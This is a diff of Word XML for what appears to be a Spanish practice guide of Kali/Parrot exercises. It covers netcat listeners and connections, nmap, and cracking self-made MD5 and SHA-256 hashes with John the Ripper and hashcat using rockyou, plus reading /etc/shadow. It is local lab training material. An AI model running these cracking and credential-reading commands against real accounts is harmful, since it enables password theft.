-        <w:t>)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4444</w:t>
+          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>36. Escuchar puerto (netcat)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>nc -lvp 4444</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="27B838DF">
-          <v:rect id="_x0000_i1518" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1590,19 +1658,14 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 192.168.1.1 4444</w:t>
+      <w:r>
+        <w:t>nc 192.168.1.1 4444</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="616A8300">
-          <v:rect id="_x0000_i1519" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
         </w:pict>
       </w:r>
     </w:p>
@@ -1622,125 +1685,976 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>nc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>lvp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 4444 &gt; archivo.txt</w:t>
+      <w:r>
+        <w:t>nc -lvp 4444 &gt; archivo.txt</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:r>
         <w:pict w14:anchorId="4E30757C">
-          <v:rect id="_x0000_i1520" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
+          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>39. Ver ARP</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>arp -a</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="3417F1C3">
+          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>40. Escaneo con timeout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>nmap --host-timeout 30s 192.168.1.1</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="15A285E8">
+          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Ttulo1"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
+        </w:rPr>
+        <w:t>🔓</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="16F7D460">
+          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>(revisar estos ejercicios, da p</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>roblemas en kali, probar en parrot)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>1. Crear carpeta de prueba</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>mkdir ~/john_prueba</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>cd ~/john_prueba</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>2. Crear el hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo "81dc9bdb52d04dc20036dbd8313ed055" &gt; hash.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>cat hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>3. Comprobar que John está instalado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>39. Ver ARP</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>arp</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> -a</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="3417F1C3">
-          <v:rect id="_x0000_i1521" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve">40. </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>Escaneo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> con timeout</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t>nmap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> --host-timeout 30s 192.168.1.1</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="15A285E8">
-          <v:rect id="_x0000_i1522" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
+        <w:t>which john</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>john --list=formats | head</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>4. Probar el hash MD5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --format=raw-md5 hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>5. Ver el resultado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>john --show --format=raw-md5 hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Debería sacar la contraseña 1234.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="12D0F8A3">
+          <v:rect id="_x0000_i1134" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Para usar wordlist</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>6. Buscar rockyou</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>ls /usr/share/wordlists</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>7. Si está comprimido</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo gunzip /usr/share/wordlists/rockyou.txt.gz</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>4</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>8. Ejecutar John con diccionario</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="75DF31B8">
+          <v:rect id="_x0000_i1135" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">49. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Si John no está instalado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt update</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>sudo apt install john -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Y si quieres hashcat:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install hashcat -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>50. HASHCAT</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Si da guerra:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="5B30444C">
+          <v:rect id="_x0000_i1150" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>51</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:t>hashid hash.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Si no está:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo apt install hashid -y</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="65B8EC80">
+          <v:rect id="_x0000_i1151" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">52 </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Crear usuario</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Y VER HASHES</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>sudo useradd test</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:br/>
+        <w:t>sudo passwd test</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Ver hashes:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo cat /etc/shadow</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>53</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. Generar el hash MD5</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo -n "admin" | md5sum</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Te saldrá algo parecido a:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>21232f297a57a5a743894a0e4a801fc3</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>54</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. Guardarlo en un archivo</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo "21232f297a57a5a743894a0e4a801fc3" &gt; hash2.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:br/>
+        <w:t>cat hash2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>55</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>. Ejecutar John indicando el formato</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --format=raw-md5 hash2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>56</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>. Mostrar el resultado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --show --format=raw-md5 hash2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="025D9006">
+          <v:rect id="_x0000_i1166" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Otro ejemplo con SHA-256</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>57</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>. Generar hash</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo -n "hola123" | sha256sum</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Te dará un hash largo. Lo copias en un archivo:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>echo "AQUI_EL_HASH" &gt; sha256.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>58</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>. Probar con John</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --format=raw-sha256 sha256.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>59</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>. Ver resultado</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --show --format=raw-sha256 sha256.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:pict w14:anchorId="5A6AF93D">
+          <v:rect id="_x0000_i1167" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
+        </w:pict>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>60.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Ejemplo usando diccionario</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>Si quieres que lo intente con rockyou:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>Y luego:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+        <w:t>john --show --format=raw-md5 hash2.txt</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-GB"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1750,861 +2664,197 @@
         <w:rPr>
           <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
         </w:rPr>
-        <w:t>🔓</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> BLOQUE 3: CRACKING Y PASSWORDS (41–60)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:pict w14:anchorId="16F7D460">
-          <v:rect id="_x0000_i1523" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
-        </w:pict>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="en-GB"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
